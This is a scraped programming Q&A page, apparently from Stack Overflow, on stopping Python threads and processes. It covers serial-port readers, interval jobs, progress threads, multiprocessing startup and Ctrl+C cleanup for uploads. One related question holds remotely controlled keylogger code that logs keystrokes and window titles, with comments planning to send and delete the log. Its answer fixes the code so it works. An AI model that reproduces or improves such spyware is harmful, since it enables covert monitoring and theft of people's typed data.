I need to run and close thread with input. Here, it uses input function to handle input. If input is start. then, run recv method as thread else input is close set second argument to False. False value to indicate loop inside recv to stop. But, My console keep open. It should close console. Cause it end of loop.
class Device():
def open(self, port, baudrate):
try:
return serial.Serial(port, baudrate)
except SerialException as e:
error = re.findall(r"'(.*?)'", str(e))
self.__error['port'] = error[0]
self.__error['description'] = error[1]
return None
def __state(self, open):
if open is None:
if self.__error['description'] == 'Access is denied.':
return True
elif self.__error['description'] == 'Port is already open.':
return True
else:
return False
else:
return True
def write(self, device, command):
if self.__state(device):
device.write(command.encode('UTF-8') + b'\r')
else:
print(self.__error['port'] + ' ' + self.__error['description'])
def recv(self, device, open = True):
while open:
if self.__state(device):
buffer = device.readline()
print(buffer)
time.sleep(1)
else:
print(device[0] + ' ' + device[1])
time.sleep(1)
device = Device()
serial = device.open('COM12', 9600)
while True:
command = input('Enter a command: ')
if command == 'start':
t = threading.Thread(target=device.recv, args=(serial,))
t.start()
elif command == 'close':
device.recv(serial, False)
elif command == 'imei':
device.write(serial, 'AT+CGSN')
If I am understanding your question, you are trying to do this:
When you begin the program and issue the start command, a new thread (Thread-2) begins executing in the recv() method of the device object
The main thread (Thread-1) continues in the event loop and presents another input prompt. At the same time, Thread-2 is looping forever inside of recv()
In Thread-1, you then issue the close command with the intention that it should disrupt Thread-2, causing it to break out of the loop and stop writing output to the terminal.
If that is correct, then the problem is in step 3: When Thread-1 makes the call device.recv(serial, False), it has no impact on the execution of Thread-2. That is because, when a thread is created and the start method is called:
t = threading.Thread(target=my_func)
t.start()
the new thread will begin executing my_func, but it will do so with it's own call stack, instruction pointer, and registers. Later, when Thread-1 calls device.recv(), it will result in a stack frame being pushed onto the call stack of Thread-1. That call is completely separate from the one that is already running in Thread-2.
Threads share many resources: Text, Data and BSS memory segments; open file descriptors; and signals (plus some other resources as well). Call stacks are not shared1.
If you need to communicate between threads, the threading library provides several options that can help. One such option is threading.Event, which can be used to communicate the occurrence of some event between threads. You could use it like this:
term_event = threading.Event()
class Device:
def recv(self, device):
while not term_event.isSet():
if self.__state(device):
buffer = device.readline()
print(buffer)
time.sleep(1)
else:
print(device[0] + ' ' + device[1])
time.sleep(1)
term_event.clear()
This creates an event object that is shared by all of the threads in the process. It can be used by Thread-1 as a way to tell Thread-2 when to exit. Then, you need to change the event loop like this:
while True:
command = input('Enter a command: ')
if command == 'start':
t = threading.Thread(target=device.recv, args=(serial,))
t.start()
elif command == 'close':
term_event.set()
elif command == 'imei':
device.write(serial, 'AT+CGSN')
Instead of calling the recv method a second time, juist set the shared event object, which Thread-2 interprets as a signal to exit. Before exiting, Thread-2 calls term_event.clear(), so a new thread can be started later on.
1: Since the threads are part of the same process, they actually occupy the same memory space as allocated by the kernel. As a consequence, each thread's private stack is (in theory) accessible by any other thread in that program.
Related
I found this non blocking code on stack overflow which is using threads to provide functionality of nonblocking setInterval function in JavaScript. But when I try to stop the process it doesn't even the Ctrl + C is not stopping it, I have tried some more methods too stop the process but they are not working.
Can someone please tell a right way to stop the process, thank you in advance.
here is the code
import threading
class ThreadJob(threading.Thread):
def __init__(self,callback,event,interval):
'''runs the callback function after interval seconds
:param callback: callback function to invoke
:param event: external event for controlling the update operation
:param interval: time in seconds after which are required to fire the callback
:type callback: function
:type interval: int
'''
self.callback = callback
self.event = event
self.interval = interval
super(ThreadJob,self).__init__()
def run(self):
while not self.event.wait(self.interval):
self.callback()
event = threading.Event()
def foo():
print ("hello")
def boo():
print ("fello")
def run():
try:
k = ThreadJob(foo,event,2)
d = ThreadJob(boo,event,6)
k.start()
d.start()
while 1:
falg = input("Press q to quit")
if(falg == 'q'):
quit()
return
except KeyboardInterrupt:
print('Stoping the script...')
except Exception as e:
print(e)
run()
print( "It is non-blocking")
All you need to do is to replace this line:
quit()
with this one:
event.set()
A Python program won't exit if there are threads still running, so the quit() function wasn't doing anything. The threads will exit their while loops once the event's internal flag is set, so a call to event.set() will cause the termination of both extra threads you created. Then the program will exit.
Note: technically you could set the threads to be "daemon" and then they will not keep the program alive. But that's not the right solution here, I think.
I am trying to make a keylogger with python sockets[educational purposes only of course]. But my question is: when I send from server to client the command activate keylogger, it will start the keylogger. But when I am finished with keylogging how can I send a 'stop keylogging' command to the slave to stop the keylogging. I was thinking of threading but really dont know what I could do with it. this is the "failing" code I made:
def mainkeylogg():
stopmess = "GO"
while stopmess == "GO":
tmpwnm = GetWindowText(GetForegroundWindow()) # get the window name .
Key = read_key();
read_key() # get key .
if len(Key) >= 2:
open("Log.txt", "a").write( # MAYBE CHANGE 'A' TO 'WB'
(f"[{tmpwnm}][{Key}]\n")) # (if user press special key) save the key with window name
else:
open("Log.txt", "a").write((f"{Key}"))
print("STOPPED THREAD")
t = threading.Thread(target=mainkeylogg)
t.start()
stopmess = (conn.recv(1024)).decode() # CAUSES THE WHILE LOOP TO CLOSE?? DOESN'T WORK
if stopmess == "STOP":
print("STOPPED")
message = "DONE"
conn.send(message.encode())
EDIT(working correct code for future people seeing this):
def mainkeylogg():
global dead
dead = False
while not dead:
tmpwnm = GetWindowText(GetForegroundWindow()) # get the window name .
Key = read_key();
read_key() # get key .
if len(Key) >= 2:
open("Log.txt", "a").write( # MAYBE CHANGE 'A' TO 'WB'
(f"[{tmpwnm}][{Key}]\n")) # (if user press special key) save the key with window name
else:
open("Log.txt", "a").write((f"{Key}"))
print("STOPPED THREAD")
t = threading.Thread(target=mainkeylogg)
t.start()
message = "STARTED KEYLOGGER"
conn.send(message.encode())
def stopkeylogger():
stopmess = (conn.recv(1024)).decode()
global dead
if stopmess == "STOP":
print("STOPPED")
dead = True
message = "STOPPED KEYLOGGER"
conn.send(message.encode())
#SEND LOG FILE
# DELETE LOG FILE
else:
print("DIDNT STOP")
message = "ERROR, DID NOT STOP KEYLOGGER"
conn.send(message.encode())
The biggest problem you have is here:
t = threading.Thread(target-mainkeylogg())
Because you added the parens, that's going to call the function immediately, in the main thread. That function won't ever return, so you don't even get to create the Thread object, much less flow on to the socket stuff. Replace that with
t = threading.Thread(target=mainkeylogg)
Pass the function, NOT the result of the function.
Beyond that, as long as you spell stopmes the same way every time (which you haven't here), the basic concept is fine. Your main thread will block waiting for word from the socket. Assuming the server actually sends "GO" as two letters without a newline, it should work.
I'm not too familiar with threading, and probably not using it correctly, but I have a script that runs a speedtest a few times and prints the average. I'm trying to use threading to call a function which displays something while the tests are running.
Everything works fine unless I try to put input() at the end of the script to keep the console window open. It causes the thread to run continuously.
I'm looking for some direction in terminating a thread correctly. Also open to any better ways to do this.
import speedtest, time, sys, datetime
from threading import Thread
s = speedtest.Speedtest()
best = s.get_best_server()
def downloadTest(tries):
x=0
downloadList = []
for x in range(tries):
downSpeed = (s.download()/1000000)
downloadList.append(downSpeed)
x+=1
results_dict = s.results.dict()
global download_avg, isp
download_avg = (sum(downloadList)/len(downloadList))
download_avg = round(download_avg,1)
isp = (results_dict['client']['isp'])
print("")
print(isp)
print(download_avg)
def progress():
while True:
print('~ ',end='', flush=True)
time.sleep(1)
def start():
now=(datetime.datetime.today().replace(microsecond=0))
print(now)
d = Thread(target= downloadTest, args=(3,))
d.start()
d1 = Thread(target = progress)
d1.daemon = True
d1.start()
d.join()
start()
input("Complete...") # this causes progress thread to keep running
There is no reason for your thread to exit, which is why it does not terminate. A daemon thread normally terminates when your programm (all other threads) terminate, which does not happen in this as the last input does not quit.
In general it is a good idea to make a thread stop by itself, rather than forcefully killing it, so you would generally kill this kind of thread with a flag. Try changing the segment at the end to:
killflag = False
start()
killflag = True
input("Complete...")
and update the progress method to:
def progress():
while not killflag:
print('~ ',end='', flush=True)
time.sleep(1)
I'm trying to use multiprocessing for doing multiple background jobs and using the main process as user interface which accepts commands through input(). Each process has to do certain jobs and will write its current status into a dictionary, which was created with manager.dict() and then passed to the Process.
After the creation of the processes, there is a loop with an input() for accessing the user commands. The commands are reduced to a minimum for simplicity here.
from multiprocessing import Manager
from multiprocessing import Process
with Manager() as manager:
producers = []
settings = [{'name':'test'}]
for setting in settings:
status = manager.dict()
logger.info("Start Producer {0}".format(setting['name']))
producer = Process(target=start_producer, args=(setting, status))
producer.start()
producers.append([producer, status])
logger.info("initialized {0} producers".format(len(producers)))
while True:
text_command = input('Enter your command:')
if text_command == 'exit':
logger.info("waiting for producers")
for p in producers:
p[0].join()
logger.info("Exit application.")
break
elif text_command == 'status':
for p in producers:
if 'name' in p[1] and 'status' in p[1]:
print('{0}:{1}'.format(p[1]['name'], p[1]['status']))
else:
print("Unknown command.")
The method which runs in other processes is pretty simple:
def start_producer(producer_setting: dict, status_dict: dict):
importer = MyProducer(producer_setting)
importer.set_status_dict(status_dict)
importer.run()
I create a MyProducer instance and set the status-dictionary through a setter of the object and call the blocking run() method, which will only return when the producer is finished. On calling set_status_dict(status_dict), the dictionary is filled with a name and status element.
When I run the code, the producer seems to get created, I receive the "Start Producer test" and "initialized 1 producers" output and after that the "Enter your command" request from the input(), but it seems that the actual process doesn't run.
When I press enter to skip the first loop iteration, I get the expected "unknown command" log and the producer-process begins the actual work. After that my "status" command also works as expected.
When I enter 'status' in the first loop-iteration I get an key-Error, because 'name' and 'status' are not set in the dictionary. Those keys should get set in set_status_dict() which itself is called in Process(target=...).
Why is that? Shouldn't producer.start() run the complete block of start_producer inside a new process and therefor never hang on the input() of the main-process?
How can I start the processes first without any user input and only then wait for input()?
Edit: A complete mvce programm with this problem can be found here: https://pastebin.com/k8xvhLhn
Edit: A solution with sleep(1) after initializing the processes has been found. But why does that behavior happen in the first place? Shouldn't run all code in start_producer() run in a new process?
I have limited experience with the multiprocessing module but I was able to get it to behave the way (i think) you want. First I added some print statements at the top of the while loop to see what might be going on and found that if the process was run or joined it worked. I figured you didn't want it to block so I added the call to run further up the process - but it appears that run() also blocks. Turns out that the process just wasn't finished when the first while loop iteration came around - adding time.sleep(30) at the top of the loop gave the process enough time to get scheduled (by the OS) and run. (On my machine it actually only needs between 200 and 300 milliseconds of nap time)
I replaced start_producer with :
def start_producer(producer_setting: dict, status_dict: dict):
## importer = MyProducer(producer_setting)
## importer.set_status_dict(status_dict)
## importer.run()
#time.sleep(30)
status_dict['name'] = 'foo'
status_dict['status'] = 'thinking'
Your code modified:
if __name__ == '__main__':
with Manager() as manager:
producers = []
settings = [{'name':'test'}]
for setting in settings:
status = manager.dict()
logger.info("Start Producer {0}".format(setting['name']))
producer = Process(target=start_producer, args=(setting, status))
producer.start()
# add a call to run() but it blocks
#producer.run()
producers.append([producer, status])
logger.info("initialized {0} producers".format(len(producers)))
while True:
time.sleep(30)
for p, s in producers:
#p.join()
#p.run()
print(f'name:{p.name}|alive:{p.is_alive()}|{s}')
if 'name' in s and 'status' in s:
print('{0}:{1}'.format(s['name'], s['status']))
text_command = input('Enter your command:')
if text_command == 'exit':
logger.info("waiting for producers")
for p in producers:
p[0].join()
logger.info("Exit application.")
break
elif text_command == 'status':
for p in producers:
if 'name' in p[1] and 'status' in p[1]:
print('{0}:{1}'.format(p[1]['name'], p[1]['status']))
else:
print("Unknown command.")
Using Linux and Python 2.7.6, I have a script that uploads lots of files at one time. I am using multi-threading with the Queue and Threading modules.
I implemented a handler for SIGINT to stop the script if the user hits ctrl-C. I prefer to use daemon threads so I don't have to clear the queue, which would require alot of re-writing code to make the SIGINT handler have access to the Queue object since the handlers don't take parameters.
To make sure the daemon threads finish and clean up before sys.exit(), I am using threading.Event() and threading.clear() to make threads wait. This code seems to work as print threading.enumerate() only shows the main thread before the script terminates when I did debugging. Just to make sure, I was wondering if there is any kind of insight to this clean up implementation that I might be missing even though it seems to be working for me:
def signal_handler(signal, frame):
global kill_received
kill_received = True
msg = (
"\n\nYou pressed Ctrl+C!"
"\nYour logs and their locations are:"
"\n{}\n{}\n{}\n\n".format(debug, error, info))
logger.info(msg)
threads = threading.Event()
threads.clear()
while True:
time.sleep(3)
threads_remaining = len(threading.enumerate())
print threads_remaining
if threads_remaining == 1:
sys.exit()
def do_the_uploads(file_list, file_quantity,
retry_list, authenticate):
"""The uploading engine"""
value = raw_input(
"\nPlease enter how many concurent "
"uploads you want at one time(example: 200)> ")
value = int(value)
logger.info('{} concurent uploads will be used.'.format(value))
confirm = raw_input(
"\nProceed to upload files? Enter [Y/y] for yes: ").upper()
if confirm == "Y":
kill_received = False
sys.stdout.write("\x1b[2J\x1b[H")
q = CustomQueue()
def worker():
global kill_received
while not kill_received:
item = q.get()
upload_file(item, file_quantity, retry_list, authenticate, q)
q.task_done()
for i in range(value):
t = Thread(target=worker)
t.setDaemon(True)
t.start()
for item in file_list:
q.put(item)
q.join()
print "Finished. Cleaning up processes...",
#Allowing the threads to cleanup
time.sleep(4)
def upload_file(file_obj, file_quantity, retry_list, authenticate, q):
"""Uploads a file. One file per it's own thread. No batch style. This way if one upload
fails no others are effected."""
absolute_path_filename, filename, dir_name, token, url = file_obj
url = url + dir_name + '/' + filename
try:
with open(absolute_path_filename) as f:
r = requests.put(url, data=f, headers=header_collection, timeout=20)
except requests.exceptions.ConnectionError as e:
pass
if src_md5 == r.headers['etag']:
file_quantity.deduct()
If you want to handle Ctrl+C; it is enough to handle KeyboardInterrupt exception in the main thread. Don't use global X in a function unless you do X = some_value in it. Using time.sleep(4) to allow the threads to cleanup is a code smell. You don't need it.
I am using threading.Event() and threading.clear() to make threads wait.
This code has no effect on your threads:
# create local variable
threads = threading.Event()
# clear internal flag in it (that is returned by .is_set/.wait methods)
threads.clear()
Don't call logger.info() from a signal handler in a multithreaded program. It might deadlock your program. Only a limited set of functions can be called from a signal handler. The safe option is to set a global flag in it and exit:
def signal_handler(signal, frame):
global kill_received
kill_received = True
# return (no more code)
The signal might be delayed until q.join() returns. Even if the signal were delivered immediately; q.get() blocks your child threads. They hang until the main thread exits. To fix both issues, you could use a sentinel to signal child processes that there are no more work, drop the signal handler completely in this case:
def worker(stopped, queue, *args):
for item in iter(queue.get, None): # iterate until queue.get() returns None
if not stopped.is_set(): # a simple global flag would also work here
upload_file(item, *args)
else:
break # exit prematurely
# do child specific clean up here
# start threads
q = Queue.Queue()
stopped = threading.Event() # set when threads should exit prematurely
threads = set()
for _ in range(number_of_threads):
t = Thread(target=worker, args=(stopped, q)+other_args)
threads.add(t)
t.daemon = True
t.start()
# provide work
for item in file_list:
q.put(item)
for _ in threads:
q.put(None) # put sentinel to signal the end
while threads: # until there are alive child threads
try:
for t in threads:
t.join(.3) # use a timeout to get KeyboardInterrupt sooner
if not t.is_alive():
threads.remove(t) # remove dead
break
except (KeyboardInterrupt, SystemExit):
print("got Ctrl+C (SIGINT) or exit() is called")
stopped.set() # signal threads to exit gracefully
I've renamed value to number_of_threads. I've used explicit threads set
If an individual upload_file() blocks then the program won't exit on Ctrl-C.
Your case seems to be simple enough for multiprocessing.Pool interface:
from multiprocessing.pool import ThreadPool
from functools import partial
def do_uploads(number_of_threads, file_list, **kwargs_for_upload_file):
process_file = partial(upload_file, **kwargs_for_upload_file)
pool = ThreadPool(number_of_threads) # number of concurrent uploads
try:
for _ in pool.imap_unordered(process_file, file_list):
pass # you could report progress here
finally:
pool.close() # no more additional work
pool.join() # wait until current work is done
It should gracefully exit on Ctrl-C i.e., uploads that are in progress are allowed to finish but new uploads are not started.